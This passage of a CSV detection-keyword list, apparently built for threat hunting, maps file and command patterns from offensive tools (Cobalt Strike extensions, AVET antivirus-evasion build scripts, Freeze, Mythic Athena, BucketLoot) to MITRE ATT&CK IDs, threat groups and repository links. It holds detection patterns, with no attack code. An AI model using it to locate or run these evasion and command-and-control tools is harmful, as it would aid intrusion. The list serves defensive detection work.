APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bshinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bshspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bsteal_token*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bsteal_token*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bucketloot -*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot https://*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot.exe -*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot.exe https://*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated 
S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-darwin64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-freebsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*BucketLoot-master*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - 
TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-openbsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-windows32.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-windows64.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*bug: pid active in ptrace_sandbox_free*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*-Build $RandomAttackPath*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*build SourcePoint.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build/breg.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*build_40xshikata_revhttpsunstaged_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_50xshikata_quiet_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. 
as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_asciimsf_fromcmd_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_asciimsf_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_dynamicfromfile_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_fopen_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_c_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*build_calcfromcmd_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_calcfrompowersh_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_checkdomain_rc4_mimikatz.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_dkmc_downloadexecshc_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadbitsadmin_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadcertutil_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_sleep_rc4_mimikatz.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_svc_20xshikata_bindtcp_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*BuildBOFs.exe*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*BuildBOFs.sln*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*Building 